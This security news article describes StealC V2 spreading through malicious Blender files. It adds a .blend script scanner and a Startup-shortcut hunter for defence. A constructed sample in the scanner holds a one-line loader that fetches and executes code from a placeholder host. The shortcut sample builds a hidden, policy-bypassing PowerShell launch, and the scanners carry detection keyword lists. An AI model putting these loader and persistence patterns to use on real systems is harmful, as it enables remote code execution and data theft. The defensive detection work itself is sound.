
Beware: Malicious Blender Files Spreading StealC Malware

Originally published on: November 26, 2025
Summary

– Russian-linked attackers deliver StealC V2 malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader.
– The attack exploits Blender’s Auto Run feature, which executes embedded Python scripts that fetch malware loaders from Cloudflare Workers domains.
– The malware deploys StealC infostealer and an auxiliary Python stealer via PowerShell scripts, achieving persistence through LNK files in the Startup directory.
– StealC V2 has expanded capabilities to steal data from over 23 browsers, 100+ cryptocurrency wallets, and various communication and VPN clients.
– Users are advised to disable ‘Auto Run Python Scripts’ in Blender preferences and treat 3D assets as executable files, using sandboxed environments for untrusted sources.

A sophisticated cyberattack campaign with suspected Russian origins is now actively distributing the StealC V2 information stealer malware through weaponized Blender files uploaded to popular 3D model marketplaces such as CGTrader. This method exploits the trusted nature of digital content platforms to deliver dangerous payloads directly to users’ systems.

Blender, a widely used open-source application for 3D modeling and animation, can run Python scripts to automate tasks, build custom user interfaces and drive complex rendering workflows. A script can be stored inside the .blend file itself as a Text datablock, and a preference known as Auto Run lets such a script execute automatically when the file is opened, which is convenient for loading character rigs, facial controls and specialized tool panels. The script runs with the full privileges of the Blender process and can import any Python module, so a .blend opened with Auto Run enabled is, in practical terms, an executable.

Cybersecurity analysts from Morphisec recently identified malicious .blend files containing embedded Python code. When opened with Auto Run enabled, the script contacts a Cloudflare Workers domain to retrieve a malware loader. This loader subsequently initiates a PowerShell script, which pulls two ZIP archives, named ZalypaGyliveraV1 and BLENDERX, from IP addresses under the attacker’s control.
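Because the script is stored inside the .blend as ordinary data, it can be read out and reviewed without ever opening the file in Blender. The following is an added example of such a triage scanner, not Morphisec's or Blender's code: it walks the file's block headers, recovers the source of every embedded Text datablock, and flags tokens such as network or process-spawning imports of the kind used by the loader described above. It assumes the classic .blend layout (12-byte file header, 20- or 24-byte block headers) used by Blender releases up to 4.x; the keyword list and the built-in sample file are constructed for illustration, and `example.workers.dev` is a placeholder, not an indicator from the campaign.

```python
"""Offline triage of a .blend: list the embedded Text datablocks (the carrier
for scripts that Auto Run executes on open) and flag risky Python tokens,
without opening the file in Blender.  Added example, not Morphisec's or
Blender's code.  Assumes the classic layout (12-byte file header, 20/24-byte
block headers) of Blender <= 4.x; keyword list and sample file are constructed."""
import gzip
import re
import struct
from typing import Iterator, List, Tuple

ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"
TEXT_CODE = b"TX\x00\x00"                      # block code of a Text datablock
# Tokens you would not expect in a character rig or tool-panel script.
SUSPICIOUS = (b"urllib", b"requests", b"socket", b"subprocess", b"os.system",
              b"powershell", b"exec(", b"eval(", b"base64", b"workers.dev")
NAME_RE = re.compile(rb"TX([ -~]{1,64})\x00")  # ID.name is "TX" + name
PRINTABLE_RE = re.compile(rb"[\t -~]{4,}")     # source lines inside DATA blocks


def load_blend_bytes(path: str) -> bytes:
    """Read a .blend, transparently handling gzip; zstd needs a prior decompress."""
    with open(path, "rb") as f:
        raw = f.read()
    if raw[:2] == b"\x1f\x8b":                 # "Compress" in Blender <= 2.9x
        return gzip.decompress(raw)
    if raw[:4] == ZSTD_MAGIC:                  # "Compress" in Blender 3.0+
        raise ValueError("zstd-compressed .blend: run `zstd -d` on it first")
    return raw


def iter_blocks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (block code, payload) for every file block up to ENDB."""
    if data[:7] != b"BLENDER":
        raise ValueError("not a .blend file")
    try:
        ptr_size = {b"_": 4, b"-": 8}[data[7:8]]
        endian = {b"v": "<", b"V": ">"}[data[8:9]]
    except KeyError:
        raise ValueError("unsupported .blend header (newer format?)") from None
    # code, size, old memory address, SDNA index, count; no padding
    hdr_fmt = endian + "4si" + ("I" if ptr_size == 4 else "Q") + "ii"
    hdr_len, off = struct.calcsize(hdr_fmt), 12
    while off + hdr_len <= len(data):
        code, size, _addr, _sdna, _count = struct.unpack_from(hdr_fmt, data, off)
        off += hdr_len
        yield code, data[off:off + size]
        if code == b"ENDB":
            return
        off += size


def embedded_scripts(data: bytes) -> List[Tuple[str, bytes]]:
    """Return (name, recovered source) per Text datablock.  A Text's lines are
    stored in the DATA blocks that directly follow its TX block, so collecting
    the printable runs from those is enough to read the script."""
    scripts, name, lines = [], None, []
    for code, payload in iter_blocks(data):
        if code == TEXT_CODE:
            if name is not None:
                scripts.append((name, b"\n".join(lines)))
            m = NAME_RE.search(payload)
            name, lines = (m.group(1).decode() if m else "<unnamed>"), []
        elif code == b"DATA" and name is not None:
            lines.extend(PRINTABLE_RE.findall(payload))
        elif name is not None:                 # any other block ends the Text
            scripts.append((name, b"\n".join(lines)))
            name, lines = None, []
    if name is not None:
        scripts.append((name, b"\n".join(lines)))
    return scripts


def triage(data: bytes) -> List[dict]:
    """One verdict per embedded script: which suspicious tokens it contains."""
    return [{"name": n, "suspicious": [t.decode() for t in SUSPICIOUS if t in src]}
            for n, src in embedded_scripts(data)]


def _block(code: bytes, payload: bytes) -> bytes:
    return struct.pack("<4siQii", code, len(payload), 0, 0, 1) + payload


def build_sample_blend() -> bytes:
    """Constructed stand-in for a weaponized .blend (64-bit, little-endian)."""
    loader = [b"import urllib.request",
              b"exec(urllib.request.urlopen('https://example.workers.dev/x').read())"]
    rig = [b"import bpy", b"bpy.ops.object.mode_set(mode='POSE')"]
    out = b"BLENDER-v302"
    for name, src in ((b"loader.py", loader), (b"rig_ui.py", rig)):
        out += _block(TEXT_CODE, b"\x00" * 16 + b"TX" + name + b"\x00")
        for line in src:
            out += _block(b"DATA", b"\x00" * 32)   # TextLine struct stand-in
            out += _block(b"DATA", line + b"\x00")  # the line's characters
    return out + _block(b"GLOB", b"\x00" * 8) + _block(b"ENDB", b"")


if __name__ == "__main__":
    import sys
    blob = load_blend_bytes(sys.argv[1]) if len(sys.argv) > 1 else build_sample_blend()
    for f in triage(blob):
        print(f"{f['name']:<24} {'SUSPICIOUS' if f['suspicious'] else 'ok'} {f['suspicious']}")
```

Run it as `python blend_triage.py model.blend` on a downloaded asset; with no argument it scans the constructed sample. A keyword hit is a reason to read the script, not a verdict, and an empty result is not a clean bill of health: scripts can also hide in Python-expression drivers, and a sufficiently obfuscated loader will not contain any of the listed tokens. Files saved by Blender 3.0 or later with compression enabled are zstd streams and must be decompressed first.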

After extracting the archives into the system's temporary folder, the malware drops LNK files into the Windows Startup directory so that the payloads are relaunched every time the user logs on. It then runs two separate data-stealing components: the primary StealC infostealer and a secondary Python-based stealer, likely a fallback in case the main payload is blocked.
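A shortcut in the Startup folder is cheap persistence and easy to audit. The following is an added example, not Morphisec's or the campaign's code, that parses every .lnk in the per-user and all-users Startup folders and flags shortcuts whose target or arguments point at a script interpreter, a user-writable path such as the temp folder, or hidden-window and policy-bypass switches. The shell-link layout follows the MS-SHLLINK specification; the risk heuristics, the folder list and the sample shortcuts are constructed for illustration and do not reproduce the real LNK files from this campaign.

```python
"""Hunt for Startup-folder persistence: parse every .lnk in the Windows
Startup folders and flag shortcuts that launch an interpreter or a payload
under a user-writable path.  Added example, not Morphisec's code; the link
layout follows MS-SHLLINK, while the heuristics and sample shortcuts are
constructed and do not reproduce the campaign's artifacts."""
import os
import struct
from typing import Dict, List

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FLAGS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                (0x20, "arguments"), (0x40, "icon"))       # StringData order
RISKY_BINARIES = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript",
                  "mshta", "python", "rundll32", "regsvr32")
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\users\\public\\")
STARTUP_DIRS = (
    os.path.join(os.environ.get("APPDATA", ""), r"Microsoft\Windows\Start Menu\Programs\Startup"),
    os.path.join(os.environ.get("ProgramData", ""), r"Microsoft\Windows\Start Menu\Programs\StartUp"),
)


def parse_lnk(buf: bytes) -> Dict[str, str]:
    """Extract LocalBasePath and the StringData fields from a shell link."""
    size, clsid, flags = struct.unpack_from("<I16sI", buf, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    off = 0x4C
    if flags & HAS_IDLIST:                       # skip LinkTargetIDList
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    target = ""
    if flags & HAS_LINKINFO:
        info_size, _hdr, info_flags, _vol_off, base_off = struct.unpack_from("<IIIII", buf, off)
        if info_flags & 0x1:                     # VolumeIDAndLocalBasePath
            end = buf.index(b"\x00", off + base_off)
            target = buf[off + base_off:end].decode("latin-1")   # ANSI path
        off += info_size
    link = {"target": target}
    for flag, key in STRING_FLAGS:               # CountCharacters + characters
        link[key] = ""
        if flags & flag:
            n = struct.unpack_from("<H", buf, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            link[key] = buf[off:off + n * width].decode("utf-16-le" if width == 2 else "latin-1")
            off += n * width
    return link


def assess(link: Dict[str, str]) -> List[str]:
    """Reasons a Startup shortcut deserves a look; empty means nothing odd."""
    blob = (link["target"] + " " + link["arguments"]).lower()
    reasons = [f"launches {b}" for b in RISKY_BINARIES if b in blob]
    reasons += [f"path under {d.strip(chr(92))}" for d in USER_WRITABLE if d in blob]
    if any(s in blob for s in ("-enc", "-w hidden", "bypass", "-windowstyle hidden")):
        reasons.append("hidden-window or policy-bypass switches")
    return reasons


def scan_startup_dirs(dirs=STARTUP_DIRS) -> List[Dict[str, str]]:
    """Parse every .lnk in the Startup folders and attach its findings."""
    results = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for fn in os.listdir(d):
            if fn.lower().endswith(".lnk"):
                with open(os.path.join(d, fn), "rb") as f:
                    link = parse_lnk(f.read())
                link.update(file=os.path.join(d, fn), reasons=assess(link))
                results.append(link)
    return results


def build_sample_lnk(target: str, arguments: str) -> bytes:
    """Constructed shell link: LinkInfo with a local path plus arguments."""
    flags = HAS_LINKINFO | 0x20 | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIH", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0,
                         0, 0, 7, 0) + b"\x00" * 10          # ShowCommand 7 = minimized
    volume = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"    # DRIVE_FIXED, empty label
    base = target.encode("latin-1") + b"\x00"
    body = volume + base + b"\x00"                           # + empty CommonPathSuffix
    info = struct.pack("<IIIIIII", 28 + len(body), 28, 1, 28, 28 + len(volume), 0,
                       28 + len(volume) + len(base)) + body
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + info + args


if __name__ == "__main__":
    sample = build_sample_lnk(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"-w hidden -ep bypass -File C:\Users\victim\AppData\Local\Temp\BLENDERX\run.ps1")
    print(assess(parse_lnk(sample)))
    for hit in scan_startup_dirs():              # live check on a Windows host
        print(hit["file"], hit["reasons"])
```

The parser deliberately stays with the standard library so it also runs on a Linux analysis box against .lnk files copied off a disk image. Shortcuts are only one of several autostart locations; a full check should also cover the Run keys and scheduled tasks, and a shortcut whose target is a legitimate interpreter still needs its arguments read before any conclusion.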

Morphisec confirmed that the StealC sample used in this campaign is the newest iteration of the malware's second major version, which Zscaler previously analyzed. This updated StealC variant significantly broadens its data harvesting: it now targets credentials from more than 23 web browsers, including support for Chrome 132 and server-side decryption of the harvested credentials, as well as over 100 cryptocurrency wallet extensions and 15 standalone crypto wallet applications. It also extracts data from messaging clients such as Telegram, Discord and Tox, VPN clients such as ProtonVPN and OpenVPN, and email applications such as Thunderbird. Additionally, the malware employs an improved User Account Control (UAC) bypass technique to elevate privileges.

Despite being publicly known since 2023, StealC continues to evade many security solutions. Morphisec reported that at the time of their analysis, not a single antivirus engine on VirusTotal flagged the malicious sample.

Because 3D model marketplaces generally do not inspect the code inside uploaded project files, users are strongly urged to practice caution. Keeping the auto-execution of Python scripts disabled in Blender is the critical defensive step: open Edit > Preferences > Save & Load and make sure 'Auto Run Python Scripts' is unchecked. The option is off by default in current Blender releases, so check whether a tutorial or add-on once prompted you to turn it on. With it off, Blender still opens the file but shows a warning banner when it contains scripts or Python-expression drivers; the 'Allow Execution' button in that banner, like the 'Trusted Source' checkbox in the file browser, should not be used for downloaded assets. Users should treat downloaded 3D assets with the same caution as executable files and obtain content only from trusted, reputable sources. For any files of uncertain origin, opening them in a sandboxed environment is highly recommended to prevent system compromise.

(Source: Bleeping Computer)
